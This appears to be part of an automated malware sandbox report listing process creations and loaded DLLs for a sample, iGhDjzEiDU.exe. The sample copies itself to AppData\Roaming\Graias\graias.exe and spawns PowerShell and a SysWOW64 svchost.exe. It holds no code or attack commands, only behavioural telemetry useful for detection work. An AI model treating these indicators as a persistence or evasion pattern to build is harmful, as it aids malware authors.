                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1980,i,14451717029141036046,9817444519185968189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1980,i,13194812879482372137,17589311234174251836,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,4041789208375361090,5104077722080206453,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1900,i,964775095578921725,9120990377794690672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: ntmarta.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: twext.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: policymanager.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: msvcp110_win.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: ntshrui.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: windows.fileexplorer.common.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: cscapi.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: shacct.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: twinapi.appcore.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: idstore.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: samlib.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: starttiledata.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: acppage.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: sfc.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: msi.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: aepic.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: sfc_os.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: wlidprov.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: samcli.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: provsvc.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: textshaping.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: policymanager.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textinputframework.dll
